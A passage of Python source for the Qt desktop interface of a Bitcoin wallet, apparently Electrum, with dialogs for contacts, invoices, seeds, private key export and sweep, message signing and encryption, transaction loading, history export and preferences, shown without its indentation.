self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove %s from your list of contacts?")
% " + ".join(labels)):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self, self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
if xtype in ['p2wpkh', 'p2wsh', 'p2wpkh-p2sh', 'p2wsh-p2sh']:
vbox.addWidget(WWLabel(_("Warning: the format of private keys associated to segwit addresses may not be compatible with other wallets")))
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = ("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.")
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message('Invalid Bitcoin address.')
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message('Cannot sign messages with this type of address.' + '\n\n' + self.msg_sign)
return
if not self.wallet.is_mine(address):
self.show_message('Address not in wallet.')
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message('Invalid Bitcoin address.')
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf-8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
from electrum.transaction import SerializationError
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electrum was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_file(self):
from electrum.transaction import SerializationError
try:
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
except SerializationError as e:
self.show_critical(_("Electrum was unable to deserialize the transaction:") + "\n" + str(e))
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r') as f:
data = f.read()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrum-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
for item in history:
tx_hash, height, confirmations, timestamp, value, balance = item
if height>0:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = _("unverified")
else:
time_string = _("unconfirmed")
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
if tx_hash:
label = wallet.get_label(tx_hash)
else:
label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent = 4))
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit()
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from electrum.wallet import sweep_preparations
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'))
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
try:
index = languages.keys().index(self.config.get("language",''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_dynfee(x):
self.config.set_key('dynamic_fees', x == Qt.Checked)
self.fee_slider.update()
dynfee_cb = QCheckBox(_('Use dynamic fees'))
dynfee_cb.setChecked(self.config.is_dynfee())
dynfee_cb.setToolTip(_("Use fees recommended by the server."))
fee_widgets.append((dynfee_cb, None))
dynfee_cb.stateChanged.connect(on_dynfee)
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_e.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
rbf_policy = self.config.get('rbf_policy', 1)
rbf_label = HelpLabel(_('Propose Replace-By-Fee') + ':', '')
rbf_combo = QComboBox()
rbf_combo.addItems([_('Always'), _('If the fee is low'), _('Never')])
rbf_combo.setCurrentIndex(rbf_policy)
def on_rbf(x):
self.config.set_key('rbf_policy', x)
rbf_combo.currentIndexChanged.connect(on_rbf)
fee_widgets.append((rbf_label, rbf_combo))
self.fee_unit = self.config.get('fee_unit', 0)
fee_unit_label = HelpLabel(_('Fee Unit') + ':', '')
fee_unit_combo = QComboBox()
fee_unit_combo.addItems([_('sat/byte'), _('mBTC/kB')])
fee_unit_combo.setCurrentIndex(self.fee_unit)
def on_fee_unit(x):
self.fee_unit = x
self.config.set_key('fee_unit', x)
self.fee_slider.update()
fee_unit_combo.currentIndexChanged.connect(on_fee_unit)
fee_widgets.append((fee_unit_label, fee_unit_combo))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['BTC', 'mBTC', 'bits']
msg = _('Base unit of your wallet.')\
+ '\n1BTC=1000mBTC.\n' \
+ _(' These settings affects the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'BTC':
self.decimal_point = 8
elif unit_result == 'mBTC':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(on_unit)
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
